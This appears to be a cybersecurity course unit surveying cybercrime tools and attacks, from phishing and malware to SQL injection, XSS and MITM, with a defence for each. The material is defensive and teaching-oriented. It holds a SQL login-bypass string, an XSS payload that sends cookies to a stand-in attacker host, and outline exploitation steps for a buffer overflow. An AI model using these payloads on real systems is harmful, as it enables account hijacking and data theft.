Unit III
Tools and Methods Used in Cybercrime
Unit Overview
This unit examines the various tools and methods employed by cybercriminals to conduct malicious activities. Understanding these techniques is essential for developing effective defensive strategies and recognizing potential threats.
Topics Covered
- Proxy Servers
- Phishing Attacks
- Password Cracking
- Keyloggers and Spyware
- Malware Types
- Steganography
- DoS/DDoS Attacks
- SQL Injection
- Wireless Attacks
- Identity Theft
3.1 Introduction
This unit examines the various tools and methods employed by cybercriminals to conduct malicious activities. Understanding these techniques is essential for developing effective defensive strategies and for recognizing potential threats.
Cybercriminals utilize a diverse arsenal of tools ranging from simple scripts to sophisticated software frameworks. These tools are used for reconnaissance, exploitation, maintaining access, and covering tracks. The methods may be automated or require significant manual expertise.
Categories of Cybercrime Tools
- Reconnaissance Tools: Used to gather information about targets
- Exploitation Tools: Used to take advantage of vulnerabilities
- Malware: Malicious software for various purposes
- Attack Tools: Used to conduct specific types of attacks
- Evasion Tools: Used to hide identity and activities
3.2 Proxy Servers and Anonymizers
Proxy Server:
An intermediary server that acts as a gateway between a user and the internet. It receives requests from clients, forwards them to target servers, and returns responses to clients, effectively hiding the client's original IP address.
Anonymizer:
A tool or service that makes internet activity untraceable by masking the user's identity and location. Anonymizers route traffic through multiple servers to obscure the origin of communications.
Types of Proxy Servers
| Type | Description | Anonymity Level |
|---|---|---|
| Transparent Proxy | Identifies itself as a proxy, passes original IP | None |
| Anonymous Proxy | Identifies as proxy but hides original IP | Moderate |
| Elite/High Anonymity Proxy | Does not identify as proxy, hides all information | High |
| Distorting Proxy | Provides false IP address | Moderate |
Anonymization Technologies
1. The Onion Router (Tor)
Tor is a network of volunteer-operated servers that enables anonymous communication by routing traffic through multiple relays, encrypting data at each hop. Each relay only knows the previous and next hop, making traffic analysis difficult.
2. Virtual Private Networks (VPN)
VPNs create encrypted tunnels between user devices and VPN servers, masking the user's IP address and encrypting all traffic. While primarily for privacy, VPNs can be misused for anonymous criminal activity.
3. Proxy Chains
Using multiple proxies in sequence to increase anonymity by adding layers of indirection between the user and the destination.
Legitimate vs. Malicious Uses
| Legitimate Uses | Malicious Uses |
|---|---|
| Privacy protection | Hiding criminal activity |
| Bypassing censorship | Evading law enforcement |
| Secure communications for journalists | Conducting cyber attacks anonymously |
| Corporate security | Distributing illegal content |
Key Points for Examination:
- Proxies act as intermediaries between users and the internet
- Tor provides layered encryption through multiple relays
- Anonymizers have both legitimate and malicious applications
- Elite proxies provide highest anonymity by not identifying as proxies
3.3 Phishing
Definition:
Phishing is a social engineering attack that uses fraudulent communications, typically emails, to deceive recipients into revealing sensitive information, clicking malicious links, or downloading malware. The attacker impersonates a legitimate entity to gain the victim's trust.
Types of Phishing Attacks
| Type | Description | Target |
|---|---|---|
| Email Phishing | Mass emails impersonating legitimate organizations | General population |
| Spear Phishing | Targeted attacks using personalized information | Specific individuals |
| Whaling | Targeting high-level executives | C-level executives |
| Clone Phishing | Replicating legitimate emails with malicious modifications | Previous recipients of legitimate emails |
| Vishing | Voice-based phishing using phone calls | Phone users |
| Smishing | SMS-based phishing | Mobile phone users |
Phishing Attack Components
- Lure: The bait that attracts victim's attention (urgency, fear, reward)
- Hook: The mechanism that captures victim's data (fake website, form)
- Catch: The exploitation of captured information
Identifying Phishing Attempts
- Suspicious sender email addresses (misspelled domains)
- Generic greetings instead of personalized salutations
- Urgent or threatening language
- Requests for sensitive information
- Mismatched or suspicious URLs
- Poor grammar and spelling errors
- Unexpected attachments
Prevention Measures
- Email filtering and anti-phishing tools
- User awareness training
- Multi-factor authentication
- URL verification before clicking
- Reporting suspicious emails
Key Points for Examination:
- Phishing exploits human psychology, not technical vulnerabilities
- Spear phishing targets specific individuals with personalized attacks
- Whaling targets senior executives with high-value access
- User training is the primary defense against phishing
3.4 Password Cracking
Definition:
Password cracking is the process of recovering passwords from stored data or from data transmitted over a network. It may be used legitimately for password recovery or maliciously for unauthorized access.
Password Cracking Techniques
| Technique | Description | Time Required |
|---|---|---|
| Brute Force | Trying all possible combinations systematically | Very long for complex passwords |
| Dictionary Attack | Using a list of common words and phrases | Fast for common passwords |
| Rainbow Table | Using pre-computed hash chains | Fast once tables are generated |
| Hybrid Attack | Combining dictionary words with variations | Moderate |
| Rule-Based Attack | Applying transformation rules to wordlists | Moderate |
Password Storage Methods
- Plain Text: Highly insecure, passwords stored as-is
- Hashing: One-way mathematical function (MD5, SHA-1, SHA-256)
- Salted Hashing: Random data added before hashing
- Key Stretching: Computationally intensive hashing (bcrypt, PBKDF2)
Defense Against Password Cracking
- Use strong, complex passwords (length, character variety)
- Implement account lockout policies
- Use salted hashes with key stretching
- Enable multi-factor authentication
- Regular password rotation
- Password strength enforcement
Key Points for Examination:
- Brute force attacks try all possible combinations
- Dictionary attacks use lists of common passwords
- Rainbow tables trade storage for computation time
- Salting prevents rainbow table attacks
3.5 Keyloggers and Spywares
Keylogger:
A keylogger is a surveillance tool that records keystrokes made on a computer or mobile device. It captures all typed information including passwords, messages, and other sensitive data.
Detailed Explanation: Keyloggers are one of the most effective tools for stealing credentials and sensitive information. They work silently in the background, capturing every key pressed by the user. The recorded data is either stored locally or transmitted to the attacker remotely.
How Keyloggers Work:
- API Hooking: Intercepts system API calls for keyboard input
- Kernel-level Hooking: Operates at the operating system kernel level for deeper access
- Form Grabbing: Captures data from web forms before encryption
- JavaScript Injection: Web-based keyloggers embedded in malicious websites
Legitimate Uses: Employee monitoring, parental controls, forensic investigations, troubleshooting
Malicious Uses: Stealing passwords, credit card numbers, personal information, corporate espionage
Spyware:
Spyware is software that secretly monitors and collects information about user activities without consent. It may track browsing habits, capture screenshots, record audio/video, and steal personal data.
Detailed Explanation: Spyware is broader than keyloggers, encompassing various surveillance capabilities. It operates covertly, consuming system resources while gathering comprehensive information about user behavior, communications, and data.
Spyware Categories:
- System Monitors: Track all computer activities including emails, chat, websites
- Tracking Cookies: Monitor web browsing and collect marketing data
- Adware: Displays unwanted ads based on collected browsing data
- Trojans: Disguised as legitimate software to gain access
- Commercial Spyware: Marketed as monitoring tools (employee/child monitoring)
- Mobile Spyware: Specialized for smartphones, tracks location, calls, messages
Impact: Privacy invasion, identity theft, financial loss, system performance degradation, bandwidth consumption
Types of Keyloggers
| Type | Description | Detection Difficulty |
|---|---|---|
| Hardware Keyloggers | Physical devices attached between keyboard and computer | Easy (visual inspection) |
| Software Keyloggers | Programs installed on the target system | Moderate (antivirus detection) |
| Kernel-Level Keyloggers | Operating at the OS kernel level | Difficult |
| Form Grabbers | Capture form data before encryption | Difficult |
| Memory-Injection Keyloggers | Inject code into running processes | Very Difficult |
Spyware Capabilities
- Keystroke logging
- Screen capture and recording
- Audio/video recording through microphone and camera
- Browser history and cookie monitoring
- Email and message interception
- File system monitoring
- Location tracking (mobile devices)
- Credential harvesting
Distribution Methods
- Bundled with free software
- Malicious email attachments
- Drive-by downloads
- Exploiting software vulnerabilities
- Social engineering
Detection and Prevention
- Anti-spyware and antivirus software
- Regular system scans
- Monitoring for unusual system behavior
- Using virtual keyboards for sensitive input
- Regular software updates
- Physical inspection for hardware keyloggers
Key Points for Examination:
- Keyloggers can be hardware or software-based
- Spyware monitors user activities without consent
- Kernel-level keyloggers are most difficult to detect
- Virtual keyboards can mitigate software keylogger risks
3.6 Virus and Worms
Computer Virus:
A virus is a malicious program that attaches itself to a legitimate program or file and requires human action to spread. When the infected program is executed, the virus activates and can replicate, corrupt data, or perform other malicious actions.
Detailed Explanation: Computer viruses are among the oldest forms of malware, named for their biological analogy. Like biological viruses, they require a host (program or file) and replicate by inserting copies of themselves into other files or programs. The key distinction is that viruses cannot spread without human intervention - someone must run the infected file.
Virus Lifecycle:
- Infection: Virus attaches to host file or program
- Activation: User executes infected file, activating virus
- Replication: Virus copies itself to other files
- Payload Delivery: Executes malicious actions (damage, data theft)
- Propagation: Spreads through file sharing, email, removable media
Common Infection Vectors: Email attachments, infected downloads, removable media (USB drives), file sharing networks, macro-enabled documents
Computer Worm:
A worm is a self-replicating malware that spreads automatically across networks without requiring human intervention or attachment to host programs. Worms exploit vulnerabilities to propagate.
Detailed Explanation: Worms are standalone malicious programs that represent a more dangerous evolution from viruses. They can scan networks for vulnerable systems, automatically exploit those vulnerabilities, copy themselves to new systems, and repeat the process - all without human interaction. This autonomous behavior enables worms to spread rapidly across networks, potentially affecting thousands of systems in hours.
Worm Characteristics:
- Self-contained: Complete executable programs, don't need host files
- Autonomous propagation: Spread without human action
- Network-aware: Actively scan and target network systems
- Exploit-driven: Leverage specific vulnerabilities for propagation
- Resource-intensive: Can severely degrade network performance
Propagation Methods:
- Network Exploitation: Exploiting vulnerabilities in network services (SMB, RDP, etc.)
- Email: Sending copies to email contacts with enticing subject lines
- File Sharing: Copying to shared network drives and folders
- Removable Media: Auto-executing from USB drives
- Instant Messaging: Spreading through chat applications
Famous Worm Examples and Their Impact:
- Morris Worm (1988): First major internet worm, affected 10% of internet (6,000 computers)
- ILOVEYOU (2000): Spread via email, caused $10 billion in damages
- Code Red (2001): Exploited IIS vulnerability, infected 359,000 servers in 14 hours
- SQL Slammer (2003): Fastest-spreading worm, doubled infected systems every 8.5 seconds
- Conficker (2008): Created massive botnet of 10-15 million computers
- WannaCry (2017): Ransomware worm affecting 200,000+ computers in 150 countries
Comparison: Virus vs. Worm
| Characteristic | Virus | Worm |
|---|---|---|
| Host Requirement | Requires host file or program | Standalone, no host needed |
| Propagation | Requires user action | Self-propagating |
| Spread Speed | Slower | Faster |
| Network Impact | Limited | Can consume bandwidth significantly |
| Primary Damage | File/system corruption | Network congestion, payload delivery |
Types of Viruses
- Boot Sector Virus: Infects the master boot record
- File Infector: Attaches to executable files
- Macro Virus: Infects document macros (Word, Excel)
- Polymorphic Virus: Changes its code to evade detection
- Metamorphic Virus: Completely rewrites itself
- Multipartite Virus: Infects multiple targets (boot sector and files)
Notable Worms
- Morris Worm (1988): First worm to gain significant attention
- ILOVEYOU (2000): Spread via email, caused billions in damage
- Code Red (2001): Exploited IIS vulnerability
- Slammer (2003): Fastest spreading worm, caused internet slowdowns
- Conficker (2008): Infected millions of computers worldwide
- WannaCry (2017): Ransomware worm exploiting EternalBlue
Key Points for Examination:
- Viruses require host programs; worms are standalone
- Worms spread automatically without user intervention
- Polymorphic viruses change code to evade detection
- Worms can cause significant network congestion
3.7 Trojan Horses and Backdoors
Trojan Horse:
A Trojan is malicious software disguised as legitimate software. Unlike viruses and worms, Trojans do not self-replicate. They trick users into installing them by appearing useful or harmless, then execute malicious functions.
Backdoor:
A backdoor is a method of bypassing normal authentication to gain remote access to a system. Backdoors may be installed by Trojans or intentionally created by developers (which may later be discovered and exploited).
Types of Trojans
| Type | Description |
|---|---|
| Remote Access Trojan (RAT) | Provides remote control over infected systems |
| Banking Trojan | Steals financial credentials and banking information |
| Downloader Trojan | Downloads and installs additional malware |
| Dropper Trojan | Contains and installs other malware payloads |
| Ransomware Trojan | Encrypts files and demands ransom |
| Rootkit | Hides its presence and other malware from detection |
Backdoor Characteristics
- Bypasses normal authentication mechanisms
- Provides persistent access to compromised systems
- May be hidden within legitimate software
- Often uses encryption to hide communications
- May use common ports to blend with normal traffic
Detection and Prevention
- Antivirus and anti-malware software
- Network traffic monitoring
- File integrity monitoring
- Application whitelisting
- Download software only from trusted sources
- Regular security audits
Key Points for Examination:
- Trojans do not self-replicate; they rely on social engineering
- RATs provide complete remote control to attackers
- Backdoors enable persistent unauthorized access
- Rootkits actively hide malware presence
3.8 Steganography
Definition:
Steganography is the practice of concealing messages or information within non-secret data or physical objects to avoid detection. Unlike cryptography, which makes data unreadable, steganography hides the very existence of the data.
Steganography vs. Cryptography
| Aspect | Steganography | Cryptography |
|---|---|---|
| Purpose | Hide existence of message | Make message unreadable |
| Detection | Difficult to detect | Presence obvious |
| Medium | Images, audio, video, text | Any data format |
| If Discovered | Message may be readable | Message still protected |
Types of Steganography
- Image Steganography: Hiding data in image files using LSB manipulation
- Audio Steganography: Embedding data in audio files
- Video Steganography: Hiding information in video streams
- Text Steganography: Using formatting, whitespace, or linguistic methods
- Network Steganography: Hiding data in network protocols
LSB (Least Significant Bit) Technique
The most common image steganography technique involves replacing the least significant bits of pixel values with message bits. Since the change is minimal, it is imperceptible to human vision.
Malicious Uses
- Concealing malware in images or documents
- Covert communication by criminals or terrorists
- Data exfiltration from organizations
- Hiding command and control communications
Detection (Steganalysis)
- Statistical analysis of carrier files
- Comparison with known clean files
- Specialized detection software
- Visual and signature-based detection
Key Points for Examination:
- Steganography hides the existence of data, not its content
- LSB technique is common for image steganography
- Often combined with encryption for additional security
- Steganalysis is the detection of hidden data
3.9 DoS and DDoS Attacks
Denial of Service (DoS):
A DoS attack is an attempt to make a system or network resource unavailable to legitimate users by overwhelming it with traffic or exploiting vulnerabilities. The attack originates from a single source.
Distributed Denial of Service (DDoS):
A DDoS attack uses multiple compromised systems (botnet) to launch a coordinated attack against a target, making it significantly more powerful and difficult to mitigate than a simple DoS attack.
Types of DoS/DDoS Attacks
1. Volume-Based Attacks
- UDP Flood: Overwhelming target with UDP packets
- ICMP Flood: Ping flood attacks
- DNS Amplification: Using DNS servers to amplify attack traffic
2. Protocol Attacks
- SYN Flood: Exploiting TCP handshake
- Ping of Death: Sending malformed ping packets
- Smurf Attack: ICMP amplification using broadcast addresses
3. Application Layer Attacks
- HTTP Flood: Overwhelming web servers with HTTP requests
- Slowloris: Keeping connections open with partial requests
- Zero-Day DDoS: Exploiting unknown vulnerabilities
DoS vs. DDoS Comparison
| Aspect | DoS | DDoS |
|---|---|---|
| Attack Source | Single system | Multiple systems (botnet) |
| Attack Power | Limited | Massive |
| Blocking | Relatively easy (block source IP) | Difficult (many sources) |
| Detection | Easier | More complex |
Mitigation Strategies
- Rate limiting and traffic filtering
- Content Delivery Networks (CDN)
- DDoS protection services
- Redundant infrastructure
- Black hole routing
- Web Application Firewalls (WAF)
Key Points for Examination:
- DoS uses single source; DDoS uses multiple sources
- SYN flood exploits TCP three-way handshake
- Amplification attacks use third-party servers to magnify traffic
- Application layer attacks are harder to detect
3.10 SQL Injection
Definition:
SQL Injection is a code injection technique that exploits vulnerabilities in applications that use SQL databases. Attackers insert malicious SQL statements into input fields to manipulate or extract data from the database.
How SQL Injection Works
SQL injection occurs when user input is incorrectly filtered or not properly sanitized before being included in SQL queries. The attacker's input becomes part of the SQL command executed by the database.
Example:
Vulnerable Query:
SELECT * FROM users WHERE username = '[user_input]' AND password = '[password]'
Malicious Input: ' OR '1'='1
Resulting Query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''
Types of SQL Injection
| Type | Description |
|---|---|
| In-band SQLi | Attacker receives results in the same channel used for attack |
| Error-based SQLi | Uses error messages to extract information |
| Union-based SQLi | Uses UNION operator to combine queries |
| Blind SQLi | No direct feedback; uses time delays or boolean conditions |
| Out-of-band SQLi | Uses different channels (DNS, HTTP) to retrieve data |
Prevention Measures
- Parameterized Queries: Use prepared statements with bound parameters
- Input Validation: Validate and sanitize all user inputs
- Stored Procedures: Use stored procedures for database access
- Least Privilege: Database accounts with minimal permissions
- Web Application Firewall: Filter malicious requests
- Error Handling: Suppress detailed error messages
Key Points for Examination:
- SQL injection exploits improper input handling
- Parameterized queries are the primary defense
- Blind SQL injection works without visible error messages
- Can result in data theft, modification, or destruction
3.11 Buffer Overflow
Definition:
A buffer overflow occurs when a program writes data beyond the boundaries of a fixed-size buffer, overwriting adjacent memory. This can lead to crashes, data corruption, or code execution if the attacker can control the overwritten memory.
Types of Buffer Overflow
| Type | Description |
|---|---|
| Stack-based | Overflow occurs in stack memory; can overwrite return addresses |
| Heap-based | Overflow occurs in heap memory; more complex to exploit |
| Integer Overflow | Arithmetic overflow leads to buffer miscalculation |
| Format String | Exploits improper use of format functions |
Exploitation Process
- Identify vulnerable input point
- Determine buffer size and memory layout
- Craft payload including shellcode
- Overflow buffer to overwrite return address
- Redirect execution to shellcode
Prevention Mechanisms
- Address Space Layout Randomization (ASLR): Randomizes memory addresses
- Data Execution Prevention (DEP): Prevents code execution in data segments
- Stack Canaries: Detection values placed before return addresses
- Bounds Checking: Validate input lengths before copying
- Safe Functions: Use secure alternatives (strncpy instead of strcpy)
- Code Review: Regular security audits of code
Key Points for Examination:
- Buffer overflow writes data beyond allocated memory
- Stack-based overflows can overwrite return addresses
- ASLR and DEP are primary OS-level protections
- Safe programming practices prevent buffer overflows
3.12 Attacks on Wireless Networks
Types of Wireless Network Attacks
| Attack | Description | Target |
|---|---|---|
| Evil Twin | Rogue access point mimicking legitimate networks | User credentials, traffic |
| Rogue Access Point | Unauthorized AP connected to network | Network access |
| War Driving | Searching for wireless networks while moving | Network discovery |
| Packet Sniffing | Intercepting wireless traffic | Data, credentials |
| WEP Cracking | Breaking weak WEP encryption | Network access |
| WPA Cracking | Dictionary attacks on WPA/WPA2-PSK | Network access |
| Deauthentication Attack | Forcing clients to disconnect | Service disruption, capture handshakes |
| KRACK Attack | Key Reinstallation Attack on WPA2 | Traffic decryption |
Wireless Security Protocols
| Protocol | Security Level | Status |
|---|---|---|
| WEP | Very Weak | Deprecated, easily cracked |
| WPA | Moderate | Superseded, TKIP vulnerabilities |
| WPA2 | Strong | Widely used, KRACK vulnerability |
| WPA3 | Very Strong | Current standard, SAE handshake |
Prevention Measures
- Use WPA3 or WPA2 with strong passphrases
- Disable WPS (Wi-Fi Protected Setup)
- Use 802.1X authentication for enterprise networks
- Implement wireless intrusion detection
- Regular security assessments
- Network segmentation
Key Points for Examination:
- WEP is deprecated due to fundamental weaknesses
- Evil twin attacks create fake access points
- WPA3 provides strongest current protection
- Enterprise networks should use 802.1X authentication
3.13 Identity Theft
Definition:
Identity theft is the fraudulent acquisition and use of another person's personal identifying information, typically for financial gain. It involves obtaining and misusing personal data such as name, social security number, credit card details, or other identifying information.
Types of Identity Theft
| Type | Description |
|---|---|
| Financial Identity Theft | Using stolen information for financial fraud |
| Criminal Identity Theft | Using another's identity when apprehended for crimes |
| Medical Identity Theft | Using stolen information to obtain medical services |
| Synthetic Identity Theft | Creating new identities combining real and fake information |
| Child Identity Theft | Using a minor's information for fraud |
| Tax Identity Theft | Filing fraudulent tax returns using stolen information |
Methods of Information Theft
- Phishing and social engineering
- Data breaches
- Dumpster diving (physical document theft)
- Mail theft
- Skimming devices
- Malware (keyloggers, spyware)
- Dark web purchases
Prevention Measures
- Monitor credit reports regularly
- Use strong, unique passwords
- Enable fraud alerts
- Shred sensitive documents
- Be cautious with personal information
- Use credit monitoring services
- Freeze credit when not applying for new credit
Key Points for Examination
- Identity theft uses personal information for fraudulent purposes
- Phishing is a primary method for obtaining personal data
- Financial identity theft is the most common type
- Regular monitoring helps detect identity theft early
3.14 Cryptography
Definition:
Cryptography is the practice and study of techniques for securing communication and data from unauthorized access. It transforms readable data (plaintext) into an unreadable format (ciphertext) that can only be decoded by authorized parties.
Key Concepts
| Term | Definition |
|---|---|
| Plaintext | The original readable data before encryption |
| Ciphertext | The encrypted, unreadable form of data |
| Encryption | The process of converting plaintext to ciphertext using an algorithm and key |
| Decryption | The process of converting ciphertext back to plaintext using a key |
| Key | A piece of information that controls the encryption/decryption process |
| Algorithm/Cipher | The mathematical procedure used for encryption and decryption |
Types of Cryptography
1. Symmetric Key Cryptography
Uses the same key for both encryption and decryption. Both sender and receiver must share the secret key securely.
| Algorithm | Key Size | Description |
|---|---|---|
| AES (Advanced Encryption Standard) | 128, 192, or 256 bits | Current industry standard; used by governments and financial institutions |
| DES (Data Encryption Standard) | 56 bits | Legacy algorithm; now considered insecure due to small key size |
| 3DES (Triple DES) | 168 bits | Applies DES three times; more secure than DES but slower |
| Blowfish | 32-448 bits | Fast, flexible block cipher; open-source alternative |
2. Asymmetric Key Cryptography (Public Key Cryptography)
Uses a pair of keys: a public key (shared openly) for encryption and a private key (kept secret) for decryption.
| Algorithm | Description | Use Cases |
|---|---|---|
| RSA (Rivest-Shamir-Adleman) | Based on factoring large prime numbers; key sizes 1024-4096 bits | Digital signatures, secure key exchange, SSL/TLS |
| ECC (Elliptic Curve Cryptography) | Based on elliptic curve mathematics; smaller keys with equivalent security | Mobile devices, IoT (due to efficiency) |
| Diffie-Hellman | Key exchange protocol for securely sharing keys over public channels | Establishing shared secrets in protocols like TLS |
3. Hash Functions
Hashing:
A hash function is a one-way mathematical function that converts input data of any size into a fixed-size output (hash value or digest). It is NOT encryption because it cannot be reversed.
Properties of Cryptographic Hash Functions:
- Deterministic: Same input always produces the same output
- One-Way: Cannot derive original input from hash value
- Collision-Resistant: Extremely difficult to find two inputs with the same hash
- Avalanche Effect: Small change in input produces completely different hash
| Algorithm | Output Size | Status |
|---|---|---|
| MD5 | 128 bits | INSECURE - collision vulnerabilities found; not recommended |
| SHA-1 | 160 bits | DEPRECATED - known weaknesses; being phased out |
| SHA-256 | 256 bits | SECURE - current recommended standard |
| SHA-3 | 224-512 bits | SECURE - newest standard with different design |
| bcrypt | Variable | SECURE - specifically designed for password hashing; includes salt |
Use Cases for Hashing:
- Password Storage: Store hashes instead of plaintext passwords
- Data Integrity: Verify files haven't been modified (checksums)
- Digital Signatures: Hash of document is signed with private key
- Forensics: Verify evidence integrity in chain of custody
Encryption vs Decryption
| Encryption | Decryption |
|---|---|
| Converts plaintext to ciphertext | Converts ciphertext back to plaintext |
| Uses encryption key and algorithm | Uses decryption key (same or different) and algorithm |
| Makes data unreadable to unauthorized parties | Restores data to readable form for authorized parties |
| Sender performs encryption | Receiver performs decryption |
Digital Signatures
Definition:
A Digital Signature is a cryptographic mechanism that provides authenticity, integrity, and non-repudiation for digital documents and messages. It uses asymmetric cryptography.
How Digital Signatures Work:
- Signing: Sender creates hash of the document, then encrypts hash with their private key
- Verification: Receiver decrypts signature with sender's public key to get hash
- Comparison: Receiver creates fresh hash of received document and compares with decrypted hash
- If hashes match, document is authentic and unmodified
Properties Provided:
- Authentication: Proves the identity of the signer
- Integrity: Detects any modification to the signed content
- Non-Repudiation: Signer cannot deny having signed the document
Legal Validity: Digital signatures are legally valid under India's IT Act 2000 (Section 3) and Information Technology (Amendment) Act 2008.
Applications of Cryptography
- HTTPS/TLS: Secure web browsing and online transactions
- Email Encryption: S/MIME, PGP for secure email
- VPNs: Encrypted tunnels for secure remote access
- Digital Certificates: PKI for website authentication
- Cryptocurrency: Blockchain uses hash functions and digital signatures
- Disk Encryption: BitLocker, FileVault, VeraCrypt
Key Points for Examination:
- Symmetric encryption uses same key for encryption and decryption (AES, DES)
- Asymmetric encryption uses public-private key pairs (RSA, ECC)
- Hashing is one-way; cannot be reversed (SHA-256, MD5)
- Digital signatures provide authenticity, integrity, and non-repudiation
- AES is the current industry standard for symmetric encryption
- SHA-256 is the recommended hash algorithm; MD5 and SHA-1 are insecure
3.15 Man-in-the-Middle (MITM) Attack
Definition:
A Man-in-the-Middle (MITM) Attack is a cyberattack where an attacker secretly intercepts and potentially alters communications between two parties who believe they are communicating directly with each other.
How MITM Attacks Work
- Interception: Attacker positions themselves between victim and target (server, website, etc.)
- Eavesdropping: Attacker captures all communications passing through
- Modification (Optional): Attacker can alter messages before forwarding
- Relay: Both parties believe they're communicating directly
Types of MITM Attacks
| Attack Type | Description | Target |
|---|---|---|
| ARP Spoofing (ARP Poisoning) | Attacker sends fake ARP messages on local network, associating their MAC address with legitimate IP addresses | Local Area Networks |
| DNS Spoofing (DNS Cache Poisoning) | Attacker corrupts DNS cache to redirect users to malicious websites | DNS servers, client caches |
| Session Hijacking | Attacker steals session cookies to impersonate authenticated user | Web sessions, authentication |
| SSL Stripping | Attacker downgrades HTTPS connections to HTTP, intercepting unencrypted traffic | HTTPS websites |
| Evil Twin Attack | Attacker creates fake Wi-Fi access point mimicking legitimate network | Wi-Fi users |
| HTTPS Spoofing | Attacker creates fake SSL certificate to impersonate legitimate website | HTTPS connections |
| Email Hijacking | Attacker gains access to email accounts and intercepts/modifies communications | Business email compromise |
Impact of MITM Attacks
- Theft of login credentials and personal information
- Financial fraud through intercepted banking sessions
- Corporate espionage and data theft
- Injection of malware into downloads
- Modification of business communications
Prevention Measures
- Use HTTPS: Always verify the padlock icon and certificate validity
- HSTS (HTTP Strict Transport Security): Forces HTTPS connections
- Certificate Pinning: Applications verify server certificates against known values
- VPN: Encrypts all traffic, preventing eavesdropping
- Strong Wi-Fi Security: Use WPA3, avoid public Wi-Fi for sensitive activities
- Two-Factor Authentication: Limits impact of stolen credentials
- Email Security: Use encrypted email (S/MIME, PGP)
- Network Security: Implement ARP spoofing detection, use static ARP entries
Key Points for Examination:
- MITM attacks intercept communication between two parties
- Common types: ARP spoofing, DNS spoofing, SSL stripping, Evil Twin
- HTTPS with valid certificates prevents most MITM attacks
- Public Wi-Fi is highly vulnerable to Evil Twin attacks
- VPNs provide strong protection by encrypting all traffic
3.16 Cross-Site Scripting (XSS)
Definition:
Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. The injected scripts execute in victims' browsers with the same privileges as legitimate page content.
Types of XSS Attacks
| Type | Description | Persistence |
|---|---|---|
| Stored XSS (Persistent) | Malicious script is permanently stored on target server (database, message board, comment field). All users who view the content are affected. | Permanent - affects multiple users |
| Reflected XSS (Non-Persistent) | Malicious script is embedded in a URL or form input and reflected back by the server in the response. Requires victim to click crafted link. | Temporary - requires user action |
| DOM-Based XSS | Vulnerability exists in client-side JavaScript code that processes user input. Script executes entirely in browser without server involvement. | Client-side only |
Impact of XSS Attacks
- Cookie Theft: Steal session cookies to hijack user accounts
- Credential Theft: Display fake login forms to capture passwords
- Malware Distribution: Redirect users to malicious downloads
- Website Defacement: Alter page content seen by users
- Keylogging: Capture keystrokes on the page
- Phishing: Display convincing phishing content within legitimate site
XSS Attack Example
A simple XSS payload in a comment field:
<script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
When other users view the comment, their cookies are sent to the attacker.
Prevention Measures
- Input Validation: Validate and sanitize all user inputs on both client and server side
- Output Encoding: Encode special characters (<, >, &, ', ") before displaying in HTML
- Content Security Policy (CSP): HTTP header that restricts script sources
- HttpOnly Cookies: Prevent JavaScript access to session cookies
- X-XSS-Protection Header: Enable browser's built-in XSS filter
- Use Security Libraries: OWASP ESAPI, DOMPurify for input sanitization
- Avoid innerHTML: Use textContent or secure DOM manipulation methods
Key Points for Examination:
- XSS allows injection of malicious scripts into web pages
- Three types: Stored (persistent), Reflected (non-persistent), DOM-based
- Mainly used to steal session cookies and credentials
- Prevention: Input validation, output encoding, CSP, HttpOnly cookies
- XSS is an OWASP Top 10 vulnerability
3.17 Firewall
Definition:
A Firewall is a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It establishes a barrier between a trusted internal network and untrusted external networks (like the Internet).
Functions of a Firewall:
- Packet Filtering: Examines packets and allows/blocks based on rules
- Access Control: Blocks unauthorized access to network resources
- Traffic Monitoring: Logs network activity for analysis
- NAT (Network Address Translation): Hides internal IP addresses from external network
- VPN Support: May facilitate secure remote connections
Types of Firewalls
| Type | OSI Layer | Description | Limitations |
|---|---|---|---|
| Packet Filtering Firewall | Layer 3-4 | Examines packet headers (IP addresses, ports, protocols) and applies rules | Cannot inspect packet content; vulnerable to IP spoofing |
| Stateful Inspection Firewall | Layer 3-4 | Tracks state of active connections and makes decisions based on context | Resource-intensive; still limited application-layer visibility |
| Application Layer Firewall (Proxy) | Layer 7 | Acts as intermediary; inspects application-layer content (HTTP, FTP, etc.) | Slower performance; may not support all protocols |
| Next-Generation Firewall (NGFW) | Layer 3-7 | Combines traditional firewall with IPS, deep packet inspection, application awareness, SSL inspection | Complex to configure; expensive |
| Hardware Firewall | Variable | Dedicated physical device protecting entire network | Cost; requires physical installation |
| Software Firewall | Variable | Application installed on individual devices | Consumes system resources; per-device management |
Firewall Rule Components
- Source IP Address: Where the traffic originates
- Destination IP Address: Where the traffic is going
- Port Number: Service port (e.g., 80 for HTTP, 443 for HTTPS)
- Protocol: TCP, UDP, ICMP, etc.
- Action: ALLOW, DENY, DROP, or LOG
- Direction: Inbound or Outbound
Examples of Firewall Products
- Enterprise: Cisco ASA, Palo Alto Networks, Fortinet FortiGate, Check Point
- Software: Windows Defender Firewall, iptables (Linux), pfSense
- Cloud: AWS Security Groups, Azure Firewall, GCP Cloud Firewall
Key Points for Examination:
- Firewall monitors and controls network traffic based on security rules
- Types: Packet filtering, Stateful inspection, Application-layer (Proxy), NGFW
- NGFW combines traditional firewall with IPS, application awareness, and deep packet inspection
- Rules based on: Source/Destination IP, Port, Protocol, Action
- Hardware firewalls protect entire networks; Software firewalls protect individual devices
3.18 Antivirus Software
Definition:
Antivirus software is a program designed to detect, prevent, and remove malicious software (malware) including viruses, worms, Trojans, spyware, ransomware, and other threats from computer systems.
How Antivirus Software Works
Detection Methods
| Method | Description | Pros/Cons |
|---|---|---|
| Signature-Based Detection | Compares file signatures against database of known malware signatures | Accurate for known threats; cannot detect new (zero-day) malware |
| Heuristic-Based Detection | Analyzes code structure and behavior patterns to identify potentially malicious code | Can detect unknown variants; may produce false positives |
| Behavioral Detection (Sandbox) | Runs suspicious files in isolated environment to observe actual behavior | Effective against evasive malware; slower performance |
| Cloud-Based Detection | Sends suspicious file hash to cloud for analysis against latest threat data | Access to real-time threat intelligence; requires internet connection |
| Machine Learning/AI Detection | Uses ML models trained on malware samples to identify new threats | Can detect novel malware; requires significant training data |
Antivirus Operations
- Real-Time (On-Access) Scanning: Monitors files as they are opened, downloaded, or executed
- On-Demand Scanning: User-initiated full or partial system scan
- Scheduled Scanning: Automatic scans at configured intervals
- Email Scanning: Scans email attachments for threats
- Download Scanning: Scans files as they are downloaded from internet
Response Actions
- Quarantine: Isolates infected file to prevent execution while preserving it for analysis
- Delete: Permanently removes the malicious file
- Disinfect/Clean: Attempts to remove malicious code while preserving original file
- Block: Prevents execution or access to suspicious file
